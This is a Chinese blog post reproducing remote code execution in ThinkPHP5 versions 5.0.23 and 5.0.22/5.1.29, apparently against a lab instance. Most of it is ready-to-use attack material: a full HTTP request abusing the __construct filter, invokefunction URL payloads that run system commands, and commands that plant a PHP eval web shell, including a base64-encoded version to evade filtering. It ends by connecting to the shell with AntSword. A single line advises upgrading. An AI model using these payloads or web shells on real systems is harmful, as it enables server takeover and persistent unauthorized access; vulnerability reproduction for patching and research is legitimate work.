ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

1.1复现ThinkPHP5 5.0.23

(1)burpsuite抓包。

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(2)send to repeater,执行命令:

POST /index.php?s=captcha HTTP/1.1

Host: 159.75.16.25:8089

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 73

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(3)写入phpinfo:

`echo "<?php phpinfo(); ?>" > /var/www/public/info.php`

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(4)查看是否写入:

ls%20-al

cat%20/var/www/public/info.php

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(5)访问查看:http://159.75.16.25:8089/info.php

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(6)上传shell:

echo%20"<?php%20@eval($_REQUEST['pass']);%20?>"%20>%20/var/www/public/pass.php

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(7)查看:cat%20pass.php,发现被过滤了。

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(8)内容base64编码:

echo%20-n%20YWFhPD9waHAgQGFzc2VydCgkX1JFUVVFU1RbJzEyMyddKTsgPz5iYmI=%20|%20base64%20-d>%20/var/www/public/pass.php

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(9)查看:cat%20pass.php

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(10)访问:http://159.75.16.25:8089/pass.php?123=phpinfo();

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(11)蚁剑连接。

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(12)右击选择文件管理。

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

1.2复现ThinkPHP5 5.0.22/5.1.29

(1)使用以下payload获取phpinfo:

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(2)自行构造要执行的payload,获取网站目录文件:

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(3)写入文件:`echo "<?php phpinfo(); ?>" > /var/www/public/info.php`

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

访问查看:http://159.75.16.25:8087/info.php

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(4)base64编码后上传shell:

echo%20-n%20YWFhPD9waHAgQGFzc2VydCgkX1JFUVVFU1RbJzEyMyddKTsgPz5iYmI=%20|%20base64%20-d>%20/var/www/public/pass.php

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(5)访问:http://159.75.16.25:8087/pass.php?123=phpinfo();

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(6)蚁剑连接。

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

(7)右击选择文件管理。

ThinkPHP5 5.0.23和ThinkPHP5 5.0.22/5.1.29漏洞复现

修复:升级ThinkPHP至安全版本。

                       

点击阅读全文

上一篇 2023年 6月 5日 am10:35
下一篇 2023年 6月 5日 am10:38